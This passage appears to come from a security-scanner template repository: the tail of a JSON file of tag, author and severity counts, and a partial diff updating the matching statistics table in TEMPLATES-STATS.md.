sualstudio","count":1},{"name":"ssltls","count":1},{"name":"openresty","count":1},{"name":"rudloff","count":1},{"name":"ignition","count":1},{"name":"bedita","count":1},{"name":"getgrav","count":1},{"name":"fontawesome","count":1},{"name":"kodexplorer","count":1},{"name":"u8","count":1},{"name":"dotnet","count":1},{"name":"dreamweaver","count":1},{"name":"ecshop","count":1},{"name":"portainer","count":1},{"name":"improvmx","count":1},{"name":"thecatapi","count":1},{"name":"objectinjection","count":1},{"name":"magicflow","count":1},{"name":"secmail","count":1},{"name":"cvnd2018","count":1},{"name":"acontent","count":1},{"name":"redmine","count":1},{"name":"spinnaker","count":1},{"name":"yongyou","count":1},{"name":"thedogapi","count":1},{"name":"barracuda","count":1},{"name":"franklinfueling","count":1},{"name":"cherokee","count":1},{"name":"fortressaircraft","count":1},{"name":"zookeeper","count":1},{"name":"bible","count":1},{"name":"charity","count":1},{"name":"phpwiki","count":1},{"name":"struts2","count":1},{"name":"eyoumail","count":1},{"name":"api-manager","count":1},{"name":"extreme","count":1},{"name":"mspcontrol","count":1},{"name":"acexy","count":1},{"name":"axxonsoft","count":1},{"name":"fastcgi","count":1},{"name":"amcrest","count":1},{"name":"block","count":1},{"name":"neo4j","count":1},{"name":"iserver","count":1},{"name":"loganalyzer","count":1},{"name":"appveyor","count":1},{"name":"kenesto","count":1},{"name":"haproxy","count":1},{"name":"trilithic","count":1},{"name":"h5s","count":1},{"name":"visualtools","count":1},{"name":"sourcecodester","count":1},{"name":"optiLink","count":1},{"name":"biometrics","count":1},{"name":"nordex","count":1},{"name":"oliver","count":1},{"name":"argocd","count":1},{"name":"route","count":1},{"name":"bash","count":1},{"name":"formalms","count":1},{"name":"floc","count":1},{"name":"shindig","count":1},{"name":"guppy","count":1},{"name":"trane","count":1},{"name":"idemia","count":1},{"name":"jwt","count":1},{"name":"abbo
tt","count":1},{"name":"loytec","count":1},{"name":"nifi","count":1},{"name":"webctrl","count":1},{"name":"tugboat","count":1},{"name":"mariadb","count":1},{"name":"timezone","count":1},{"name":"fortigates","count":1},{"name":"nownodes","count":1},{"name":"cve2021wordpress","count":1},{"name":"musicstore","count":1},{"name":"mirasys","count":1},{"name":"binance","count":1},{"name":"instatus","count":1},{"name":"roundcube","count":1},{"name":"bing","count":1},{"name":"elevation","count":1},{"name":"issabel","count":1},{"name":"kvm","count":1},{"name":"ubnt","count":1},{"name":"pyramid","count":1},{"name":"sunflower","count":1},{"name":"pyspider","count":1},{"name":"bookstack","count":1},{"name":"concrete5","count":1},{"name":"wago","count":1},{"name":"launchdarkly","count":1},{"name":"zenario","count":1},{"name":"particle","count":1},{"name":"atvise","count":1},{"name":"mozilla","count":1},{"name":"wmt","count":1},{"name":"helpdesk","count":1},{"name":"flexbe","count":1},{"name":"redhat","count":1},{"name":"cliniccases","count":1},{"name":"pagespeed","count":1},{"name":"geoserver","count":1},{"name":"admin","count":1},{"name":"jspxcms","count":1},{"name":"mdb","count":1},{"name":"directadmin","count":1},{"name":"mrtg","count":1},{"name":"uwsgi","count":1},{"name":"ptr","count":1},{"name":"apiman","count":1},{"name":"harvardart","count":1},{"name":"defectdojo","count":1},{"name":"teradici","count":1},{"name":"servicedesk","count":1},{"name":"dicoogle","count":1},{"name":"shopizer","count":1},{"name":"google-earth","count":1},{"name":"cve2002","count":1},{"name":"cve2001","count":1},{"name":"cofax","count":1},{"name":"couchcms","count":1},{"name":"dwr","count":1},{"name":"adoptapet","count":1},{"name":"monitorr","count":1},{"name":"planon","count":1},{"name":"alquist","count":1},{"name":"processmaker","count":1},{"name":"mpsec","count":1},{"name":"finereport","count":1},{"name":"shortcode","count":1},{"name":"catfishcms","count":1},{"name":"fortilogger","count":1},{"na
me":"gemweb","count":1},{"name":"grails","count":1},{"name":"webmail","count":1},{"name":"axiom","count":1},{"name":"roads","count":1},{"name":"xmlchart","count":1},{"name":"sureline","count":1},{"name":"deviantart","count":1},{"name":"esmtp","count":1},{"name":"groupoffice","count":1},{"name":"ricoh","count":1},{"name":"redcap","count":1},{"name":"casemanager","count":1},{"name":"appweb","count":1},{"name":"wing-ftp","count":1},{"name":"lionwiki","count":1},{"name":"dvdFab","count":1},{"name":"cybrotech","count":1},{"name":"web-suite","count":1},{"name":"totolink","count":1},{"name":"moin","count":1},{"name":"oscommerce","count":1},{"name":"bullwark","count":1},{"name":"nomad","count":1},{"name":"fastapi","count":1},{"name":"taiga","count":1},{"name":"webmodule-ee","count":1},{"name":"buttercms","count":1},{"name":"fanwei","count":1},{"name":"natemail","count":1},{"name":"wiki","count":1},{"name":"smartsense","count":1},{"name":"identityguard","count":1},{"name":"fiori","count":1},{"name":"opencast","count":1},{"name":"microcomputers","count":1},{"name":"landray","count":1},{"name":"blue-ocean","count":1},{"name":"dbeaver","count":1},{"name":"lancom","count":1},{"name":"calendarific","count":1},{"name":"cryptocurrencies","count":1},{"name":"gpon","count":1},{"name":"crestron","count":1},{"name":"revslider","count":1},{"name":"ueditor","count":1},{"name":"bitrise","count":1},{"name":"prototype","count":1},{"name":"redwood","count":1},{"name":"oidc","count":1},{"name":"oki","count":1},{"name":"zuul","count":1},{"name":"scimono","count":1},{"name":"travis","count":1},{"name":"flowci","count":1},{"name":"beanshell","count":1},{"name":"commscope","count":1},{"name":"buildkite","count":1},{"name":"wdja","count":1},{"name":"clink-office","count":1},{"name":"chinaunicom","count":1},{"name":"phoronix","count":1},{"name":"optimizely","count":1},{"name":"h2","count":1},{"name":"oauth2","count":1},{"name":"tracer","count":1},{"name":"intelliflash","count":1},{"name":"xunchi","
count":1},{"name":"alertmanager","count":1},{"name":"rijksmuseum","count":1},{"name":"dom","count":1},{"name":"polarisft","count":1},{"name":"ldap","count":1},{"name":"ucs","count":1},{"name":"dbt","count":1},{"name":"streetview","count":1},{"name":"billquick","count":1},{"name":"ilo4","count":1},{"name":"xml","count":1},{"name":"zoomsounds","count":1},{"name":"viaware","count":1},{"name":"admidio","count":1},{"name":"easyappointments","count":1},{"name":"landrayoa","count":1},{"name":"burp","count":1},{"name":"pinata","count":1},{"name":"rsyncd","count":1},{"name":"blackboard","count":1},{"name":"daybyday","count":1},{"name":"meshcentral","count":1},{"name":"netrc","count":1},{"name":"powercreator","count":1},{"name":"zms","count":1},{"name":"snipeit","count":1},{"name":"twig","count":1},{"name":"erp-nc","count":1},{"name":"gocron","count":1},{"name":"petfinder","count":1},{"name":"tika","count":1},{"name":"logontracer","count":1},{"name":"ecsimagingpacs","count":1},{"name":"eyou","count":1},{"name":"meraki","count":1},{"name":"purestorage","count":1},{"name":"opensso","count":1},{"name":"caseaware","count":1},{"name":"etherscan","count":1},{"name":"domino","count":1},{"name":"instagram","count":1},{"name":"smartblog","count":1},{"name":"mojoauth","count":1},{"name":"babel","count":1},{"name":"soar","count":1},{"name":"sco","count":1},{"name":"wondercms","count":1},{"name":"pihole","count":1},{"name":"holidayapi","count":1},{"name":"dropbox","count":1},{"name":"pippoint","count":1},{"name":"werkzeug","count":1},{"name":"eyoucms","count":1},{"name":"wavlink","count":1},{"name":"yachtcontrol","count":1},{"name":"osquery","count":1},{"name":"hortonworks","count":1},{"name":"keenetic","count":1},{"name":"lacie","count":1},{"name":"newsletter","count":1},{"name":"scanii","count":1},{"name":"delta","count":1},{"name":"spotify","count":1},{"name":"weglot","count":1},{"name":"aura","count":1},{"name":"saml","count":1},{"name":"tor","count":1},{"name":"securenvoy","count":1
},{"name":"stridercd","count":1},{"name":"honeypot","count":1},{"name":"wazuh","count":1},{"name":"commvault","count":1},{"name":"sponip","count":1},{"name":"mara","count":1},{"name":"comfortel","count":1},{"name":"myucms","count":1},{"name":"buddy","count":1},{"name":"incapptic-connect","count":1},{"name":"ncbi","count":1},{"name":"faust","count":1},{"name":"netweaver","count":1},{"name":"spectracom","count":1},{"name":"codemeter","count":1},{"name":"hiawatha","count":1},{"name":"skywalking","count":1},{"name":"avalanche","count":1},{"name":"primefaces","count":1},{"name":"projector","count":1},{"name":"satellian","count":1},{"name":"pan","count":1},{"name":"vsftpd","count":1},{"name":"mkdocs","count":1},{"name":"tieline","count":1},{"name":"bonita","count":1},{"name":"springframework","count":1},{"name":"jnoj","count":1},{"name":"leanix","count":1},{"name":"ebird","count":1},{"name":"supervisor","count":1},{"name":"oam","count":1},{"name":"accent","count":1},{"name":"luftguitar","count":1},{"name":"zmanda","count":1},{"name":"vercel","count":1},{"name":"contactform","count":1},{"name":"sls","count":1},{"name":"eyelock","count":1},{"name":"emessage","count":1},{"name":"fcm","count":1},{"name":"netbeans","count":1},{"name":"qizhi","count":1},{"name":"plone","count":1},{"name":"routeros","count":1},{"name":"faraday","count":1},{"name":"szhe","count":1},{"name":"tplink","count":1},{"name":"chevereto","count":1},{"name":"cve2000","count":1},{"name":"alltube","count":1},{"name":"phpfastcache","count":1},{"name":"contentkeeper","count":1},{"name":"javafaces","count":1},{"name":"openweather","count":1},{"name":"place","count":1},{"name":"pendo","count":1},{"name":"xoops","count":1},{"name":"panasonic","count":1},{"name":"avada","count":1},{"name":"vanguard","count":1},{"name":"phalcon","count":1},{"name":"strider","count":1},{"name":"interactsh","count":1},{"name":"coinlayer","count":1},{"name":"weboftrust","count":1},{"name":"playable","count":1},{"name":"micro","count":
1},{"name":"dotclear","count":1},{"name":"phpunit","count":1},{"name":"iframe","count":1},{"name":"jeecg-boot","count":1},{"name":"rsa","count":1},{"name":"openerp","count":1},{"name":"mongoshake","count":1},{"name":"trello","count":1},{"name":"kerbynet","count":1},{"name":"hanming","count":1},{"name":"remkon","count":1},{"name":"pastebin","count":1},{"name":"bitquery","count":1},{"name":"apcu","count":1},{"name":"edgeos","count":1},{"name":"gsm","count":1},{"name":"mtheme","count":1},{"name":"zentral","count":1},{"name":"matomo","count":1},{"name":"razor","count":1},{"name":"extractor","count":1},{"name":"coinapi","count":1},{"name":"gloo","count":1},{"name":"nweb2fax","count":1},{"name":"vms","count":1},{"name":"acsoft","count":1},{"name":"cors","count":1},{"name":"dwsync","count":1},{"name":"viewlinc","count":1},{"name":"webex","count":1},{"name":"aims","count":1},{"name":"malshare","count":1},{"name":"myvuehelp","count":1},{"name":"opensmtpd","count":1},{"name":"moonpay","count":1},{"name":"socomec","count":1},{"name":"sgp","count":1},{"name":"covalent","count":1}],"authors":[{"name":"daffainfo","count":560},{"name":"dhiyaneshdk","count":421},{"name":"pikpikcu","count":316},{"name":"pdteam","count":262},{"name":"geeknik","count":179},{"name":"dwisiswant0","count":168},{"name":"princechaddha","count":133},{"name":"0x_akoko","count":130},{"name":"gy741","count":118},{"name":"pussycat0x","count":116},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":47},{"name":"gaurang","count":42},{"name":"ritikchaddha","count":42},{"name":"philippedelteil","count":36},{"name":"adam 
crosser","count":30},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"c-sh0","count":23},{"name":"ffffffff0x","count":22},{"name":"akincibor","count":20},{"name":"righettod","count":18},{"name":"cckuailong","count":17},{"name":"for3stco1d","count":16},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"techbrunchfr","count":14},{"name":"sharath","count":13},{"name":"sullo","count":12},{"name":"suman_kar","count":12},{"name":"wdahlenb","count":11},{"name":"melbadry9","count":11},{"name":"cyllective","count":11},{"name":"johnk3r","count":10},{"name":"alph4byt3","count":10},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":10},{"name":"meme-lord","count":10},{"name":"dogasantos","count":9},{"name":"emadshanab","count":9},{"name":"edoardottt","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"0x240x23elu","count":7},{"name":"divya_mudgal","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"logicalhunter","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"random-robbie","count":7},{"name":"iamnoooob","count":6},{"name":"caspergn","count":6},{"name":"evan 
rubinstein","count":6},{"name":"rootxharsh","count":6},{"name":"__fazal","count":6},{"name":"forgedhallpass","count":6},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"pathtaga","count":6},{"name":"leovalcante","count":6},{"name":"ganofins","count":5},{"name":"elsfa7110","count":5},{"name":"yanyun","count":5},{"name":"xelkomy","count":5},{"name":"_0xf4n9x_","count":5},{"name":"praetorian-thendrickson","count":5},{"name":"lu4nx","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"imnightmaree","count":5},{"name":"podalirius","count":5},{"name":"wisnupramoedya","count":4},{"name":"dadevel","count":4},{"name":"dolev farhi","count":4},{"name":"tanq16","count":4},{"name":"tess","count":4},{"name":"e_schultze_","count":4},{"name":"h1ei1","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"defr0ggy","count":4},{"name":"mr-xn","count":3},{"name":"skeltavik","count":3},{"name":"lark-lab","count":3},{"name":"dudez","count":3},{"name":"johnjhacking","count":3},{"name":"0w4ys","count":3},{"name":"shifacyclewala","count":3},{"name":"fyoorer","count":3},{"name":"me9187","count":3},{"name":"github.com/its0x08","count":3},{"name":"sushantkamble","count":3},{"name":"arcc","count":3},{"name":"shine","count":3},{"name":"davidmckennirey","count":3},{"name":"unstabl3","count":3},{"name":"mavericknerd","count":3},{"name":"binaryfigments","count":3},{"name":"gitlab red team","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"impramodsargar","count":3},{"name":"f1tz","count":3},{"name":"_generic_human_","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"r3naissance","count":3},{"name":"jarijaas","count":3},{"name":"whoever","count":3},{"name":"andydoering","count":3},{"name":"supras","count":3},{"name":"emenalf","count":3},{"name":"alifathi-h1","count":3},{"name":"yash anand 
@yashanand155","count":3},{"name":"veshraj","count":3},{"name":"sbani","count":2},{"name":"nuk3s3c","count":2},{"name":"splint3r7","count":2},{"name":"hahwul","count":2},{"name":"martincodes-de","count":2},{"name":"zomsop82","count":2},{"name":"socketz","count":2},{"name":"g4l1t0","count":2},{"name":"hackerarpan","count":2},{"name":"z0ne","count":2},{"name":"cckuakilong","count":2},{"name":"0xcrypto","count":2},{"name":"ajaysenr","count":2},{"name":"raesene","count":2},{"name":"gevakun","count":2},{"name":"paperpen","count":2},{"name":"kre80r","count":2},{"name":"manas_harsh","count":2},{"name":"amsda","count":2},{"name":"hetroublemakr","count":2},{"name":"nvn1729","count":2},{"name":"sy3omda","count":2},{"name":"bernardofsr","count":2},{"name":"moritz nentwig","count":2},{"name":"vsh00t","count":2},{"name":"smaranchand","count":2},{"name":"ehsahil","count":2},{"name":"parth","count":2},{"name":"afaq","count":2},{"name":"redteambrasil","count":2},{"name":"kiblyn11","count":2},{"name":"geekby","count":2},{"name":"0xsmiley","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"danielmofer","count":2},{"name":"thardt-praetorian","count":2},{"name":"koti2","count":2},{"name":"y4er","count":2},{"name":"randomrobbie","count":2},{"name":"0xrudra","count":2},{"name":"rafaelwdornelas","count":2},{"name":"luci","count":2},{"name":"r12w4n","count":2},{"name":"dahse89","count":2},{"name":"its0x08","count":2},{"name":"huowuzhao","count":2},{"name":"convisoappsec","count":2},{"name":"k11h-de","count":2},{"name":"mohammedsaneem","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"bing0o","count":2},{"name":"hassan khan yusufzai - 
splint3r7","count":2},{"name":"cocxanh","count":2},{"name":"dheerajmadhukar","count":2},{"name":"ambassify","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"bananabr","count":2},{"name":"pxmme1337","count":2},{"name":"ree4pwn","count":2},{"name":"taielab","count":2},{"name":"swissky","count":2},{"name":"0xprial","count":2},{"name":"x1m_martijn","count":2},{"name":"w4cky_","count":2},{"name":"lotusdll","count":2},{"name":"0xelkomy","count":2},{"name":"bsysop","count":2},{"name":"udit_thakkur","count":2},{"name":"bp0lr","count":2},{"name":"paradessia","count":2},{"name":"0xsapra","count":2},{"name":"foulenzer","count":2},{"name":"nkxxkn","count":2},{"name":"vavkamil","count":2},{"name":"gal nagli","count":2},{"name":"revblock","count":1},{"name":"mah3sec_","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"osamahamad","count":1},{"name":"schniggie","count":1},{"name":"deena","count":1},{"name":"pratik khalane","count":1},{"name":"ola456","count":1},{"name":"rodnt","count":1},{"name":"yashgoti","count":1},{"name":"sec_hawk","count":1},{"name":"alexrydzak","count":1},{"name":"soyelmago","count":1},{"name":"evan rubinstien","count":1},{"name":"juicypotato1","count":1},{"name":"thebinitghimire","count":1},{"name":"infosecsanyam","count":1},{"name":"xstp","count":1},{"name":"igibanez","count":1},{"name":"francescocarlucci","count":1},{"name":"exceed","count":1},{"name":"x6263","count":1},{"name":"0ut0fb4nd","count":1},{"name":"sshell","count":1},{"name":"shreyapohekar","count":1},{"name":"_darrenmartyn","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"hakluke","count":1},{"name":"patralos","count":1},{"name":"wabafet","count":1},{"name":"majidmc2","count":1},{"name":"0xd0ff9","count":1},{"name":"2rs3c","count":1},{"name":"matthew nickerson (b0than) @ layer 8 
security","count":1},{"name":"berkdusunur","count":1},{"name":"bad5ect0r","count":1},{"name":"harshinsecurity","count":1},{"name":"b0rn2r00t","count":1},{"name":"furkansenan","count":1},{"name":"p-l-","count":1},{"name":"absshax","count":1},{"name":"lethargynavigator","count":1},{"name":"breno_css","count":1},{"name":"fopina","count":1},{"name":"0xteles","count":1},{"name":"ohlinge","count":1},{"name":"cookiehanhoan","count":1},{"name":"rubina119","count":1},{"name":"ph33r","count":1},{"name":"phyr3wall","count":1},{"name":"zsusac","count":1},{"name":"prettyboyaaditya","count":1},{"name":"jeya seelan","count":1},{"name":"sherlocksecurity","count":1},{"name":"adrianmf","count":1},{"name":"retr0","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"0xtavian","count":1},{"name":"noobexploiter","count":1},{"name":"myztique","count":1},{"name":"ringo","count":1},{"name":"omarkurt","count":1},{"name":"charanrayudu","count":1},{"name":"zhenwarx","count":1},{"name":"th3.d1p4k","count":1},{"name":"xshuden","count":1},{"name":"oscarintherocks","count":1},{"name":"whynotke","count":1},{"name":"amnotacat","count":1},{"name":"opencirt","count":1},{"name":"dievus","count":1},{"name":"ofjaaah","count":1},{"name":"thezakman","count":1},{"name":"notsoevilweasel","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"brabbit10","count":1},{"name":"dawid-czarnecki","count":1},{"name":"udyz","count":1},{"name":"hanlaomo","count":1},{"name":"qlkwej","count":1},{"name":"jas37","count":1},{"name":"remonsec","count":1},{"name":"narluin","count":1},{"name":"aaron_costello 
(@conspiracyproof)","count":1},{"name":"daffianfo","count":1},{"name":"act1on3","count":1},{"name":"akshansh","count":1},{"name":"thevillagehacker","count":1},{"name":"affix","count":1},{"name":"jeya.seelan","count":1},{"name":"push4d","count":1},{"name":"v0idc0de","count":1},{"name":"d0rkerdevil","count":1},{"name":"orpheus","count":1},{"name":"justmumu","count":1},{"name":"apt-mirror","count":1},{"name":"arr0way","count":1},{"name":"c3l3si4n","count":1},{"name":"prajiteshsingh","count":1},{"name":"pudsec","count":1},{"name":"luskabol","count":1},{"name":"petruknisme","count":1},{"name":"kaizensecurity","count":1},{"name":"makyotox","count":1},{"name":"mesaglio","count":1},{"name":"d4vy","count":1},{"name":"ooooooo_q","count":1},{"name":"toufik-airane","count":1},{"name":"exploitation","count":1},{"name":"_harleo","count":1},{"name":"clment cruchet","count":1},{"name":"kabirsuda","count":1},{"name":"intx0x80","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"0xrod","count":1},{"name":"xeldax","count":1},{"name":"3th1c_yuk1","count":1},{"name":"duty_1g","count":1},{"name":"shelld3v","count":1},{"name":"kurohost","count":1},{"name":"tirtha","count":1},{"name":"s1r1u5_","count":1},{"name":"luqmaan hadia","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"yashanand155","count":1},{"name":"rschio","count":1},{"name":"kailashbohara","count":1},{"name":"alevsk","count":1},{"name":"miroslavsotak","count":1},{"name":"tim_koopmans","count":1},{"name":"jrolf","count":1},{"name":"un-fmunozs","count":1},{"name":"daviey","count":1},{"name":"kiks7","count":1},{"name":"philippdelteil","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"tea","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"akash.c","count":1},{"name":"kareemse1im","count":1},{"name":"jteles","count":1},{"name":"compr00t","count":1},{"name":"0xceeb","count":1},{"name":"kishore krishna 
(sillydaddy)","count":1},{"name":"luqman","count":1},{"name":"manuelbua","count":1},{"name":"0xh7ml","count":1},{"name":"noamrathaus","count":1},{"name":"andirrahmani1","count":1},{"name":"mrcl0wnlab","count":1},{"name":"nerrorsec","count":1},{"name":"f1she3","count":1},{"name":"b0yd","count":1},{"name":"yuansec","count":1},{"name":"jbaines-r7","count":1},{"name":"elmahdi","count":1},{"name":"mhdsamx","count":1},{"name":"aresx","count":1},{"name":"micha3lb3n","count":1},{"name":"_c0wb0y_","count":1},{"name":"aaronchen0","count":1},{"name":"bartu utku sarp","count":1},{"name":"florianmaak","count":1},{"name":"nytr0gen","count":1},{"name":"sickwell","count":1},{"name":"momen eldawakhly","count":1},{"name":"lark lab","count":1},{"name":"ilovebinbash","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"bjhulst","count":1},{"name":"ahmed sherif","count":1},{"name":"geraldino2","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"andysvints","count":1},{"name":"ldionmarcil","count":1},{"name":"j33n1k4","count":1},{"name":"shifacyclewla","count":1},{"name":"thesubtlety","count":1},{"name":"arall","count":1},{"name":"skylark-lab","count":1},{"name":"clarkvoss","count":1},{"name":"streetofhackerr007","count":1},{"name":"rojanrijal","count":1},{"name":"retr02332","count":1},{"name":"husain","count":1},{"name":"ok_bye_now","count":1},{"name":"exid","count":1},{"name":"elouhi","count":1},{"name":"official_blackhat13","count":1},{"name":"alex","count":1},{"name":"nielsing","count":1},{"name":"chron0x","count":1},{"name":"fmunozs","count":1},{"name":"ggranjus","count":1},{"name":"gboddin","count":1},{"name":"ipanda","count":1},{"name":"evolutionsec","count":1},{"name":"borna nematzadeh","count":1},{"name":"sicksec","count":1},{"name":"pdp","count":1},{"name":"dhiyaneshdki","count":1},{"name":"mass0ma","count":1},{"name":"furkansayim","count":1},{"name":"0xceba","count":1},{"name":"higor melgaço 
(eremit4)","count":1},{"name":"izn0u","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"alperenkesk","count":1},{"name":"undefl0w","count":1},{"name":"becivells","count":1},{"name":"flag007","count":1},{"name":"fq_hsu","count":1},{"name":"ahmetpergamum","count":1},{"name":"coldfish","count":1},{"name":"zandros0","count":1},{"name":"willd96","count":1},{"name":"elder tao","count":1},{"name":"anon-artist","count":1},{"name":"knassar702","count":1},{"name":"0h1in9e","count":1},{"name":"blckraven","count":1},{"name":"hexcat","count":1},{"name":"rotemreiss","count":1},{"name":"tirtha_mandal","count":1},{"name":"ahmed abou-ela","count":1},{"name":"bughuntersurya","count":1},{"name":"jiheon-dev","count":1},{"name":"iampritam","count":1},{"name":"brenocss","count":1},{"name":"korteke","count":1},{"name":"co0nan","count":1},{"name":"regala_","count":1},{"name":"0ri2n","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"droberson","count":1},{"name":"b4uh0lz","count":1},{"name":"zinminphy0","count":1},{"name":"vzamanillo","count":1},{"name":"mubassirpatel","count":1},{"name":"manasmbellani","count":1},{"name":"manikanta a.k.a 
@secureitmania","count":1},{"name":"yavolo","count":1},{"name":"notnotnotveg","count":1},{"name":"wlayzz","count":1}],"directory":[{"name":"cves","count":1160},{"name":"exposed-panels","count":523},{"name":"vulnerabilities","count":452},{"name":"technologies","count":255},{"name":"exposures","count":204},{"name":"misconfiguration","count":197},{"name":"workflows","count":186},{"name":"token-spray","count":154},{"name":"default-logins","count":95},{"name":"file","count":68},{"name":"takeovers","count":67},{"name":"iot","count":38},{"name":"network","count":35},{"name":"miscellaneous","count":23},{"name":"cnvd","count":22},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1192},{"name":"high","count":874},{"name":"medium","count":662},{"name":"critical","count":414},{"name":"low","count":183},{"name":"unknown","count":6}],"types":[{"name":"http","count":3187},{"name":"file","count":68},{"name":"network","count":50},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index e6efa3ef83..202c85dca8 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md 
@@ -1,1546 +1,1555 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 | -| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 | -| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 | -| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 | -| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | | -| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | | -| rce | 289 | princechaddha | 130 | workflows | 186 | | | | | -| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | | -| tech | 265 | gy741 | 117 | default-logins | 95 | | | | | -| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | | -| cve2020 | 196 | madrobot | 65 | takeovers | 67 | | | | | +| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 | +| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 | +| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 | +| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 | +| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | | +| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | | +| rce | 291 | princechaddha | 133 | workflows | 186 | | | | | +| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | | +| tech | 271 | gy741 | 118 | default-logins | 95 | | | | | +| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | | +| cve2020 | 197 | madrobot | 65 | takeovers | 67 | | | | | | | 188 | zzeitlin | 64 | iot | 38 | | | | | -| token-spray | 153 | idealphase | 46 | network | 35 | | | | | -| joomla | 131 | gaurang | 42 | miscellaneous | 23 | | | | | -| 
config | 126 | ritikchaddha | 37 | cnvd | 22 | | | | | -| cve2018 | 120 | philippedelteil | 36 | dns | 17 | | | | | +| token-spray | 154 | idealphase | 47 | network | 35 | | | | | +| joomla | 131 | ritikchaddha | 42 | miscellaneous | 23 | | | | | +| config | 126 | gaurang | 42 | cnvd | 22 | | | | | +| cve2018 | 121 | philippedelteil | 36 | dns | 17 | | | | | | apache | 120 | adam crosser | 30 | fuzzing | 12 | | | | | | cve2019 | 118 | ice3man | 26 | headless | 6 | | | | | | cve2010 | 111 | organiccrap | 24 | ssl | 4 | | | | | -| default-login | 109 | c-sh0 | 23 | | | | | | | -| unauth | 103 | ffffffff0x | 22 | | | | | | | -| iot | 102 | righettod | 18 | | | | | | | -| oast | 96 | cckuailong | 17 | | | | | | | -| login | 85 | akincibor | 16 | | | | | | | -| takeover | 73 | pr3r00t | 15 | | | | | | | -| token | 72 | sheikhrishad | 15 | | | | | | | -| redirect | 68 | for3stco1d | 15 | | | | | | | -| misconfig | 65 | r3dg33k | 14 | | | | | | | -| cve2017 | 64 | techbrunchfr | 14 | | | | | | | -| sqli | 62 | milo2012 | 14 | | | | | | | -| ssrf | 60 | sharath | 13 | | | | | | | +| default-login | 110 | c-sh0 | 23 | | | | | | | +| unauth | 108 | ffffffff0x | 22 | | | | | | | +| iot | 102 | akincibor | 20 | | | | | | | +| oast | 97 | righettod | 18 | | | | | | | +| login | 85 | cckuailong | 17 | | | | | | | +| takeover | 73 | for3stco1d | 16 | | | | | | | +| token | 72 | pr3r00t | 15 | | | | | | | +| redirect | 71 | sheikhrishad | 15 | | | | | | | +| misconfig | 65 | techbrunchfr | 14 | | | | | | | +| cve2017 | 64 | r3dg33k | 14 | | | | | | | +| cve2022 | 63 | milo2012 | 14 | | | | | | | +| sqli | 62 | sharath | 13 | | | | | | | +| ssrf | 61 | suman_kar | 12 | | | | | | | | file | 60 | sullo | 12 | | | | | | | -| cve2022 | 59 | suman_kar | 12 | | | | | | | +| wp | 55 | wdahlenb | 11 | | | | | | | | network | 53 | melbadry9 | 11 | | | | | | | -| oracle | 50 | cyllective | 11 | | | | | | | -| wp | 49 | wdahlenb | 11 | | | | | | | -| router | 49 | nadino | 10 | | | | | | | -| 
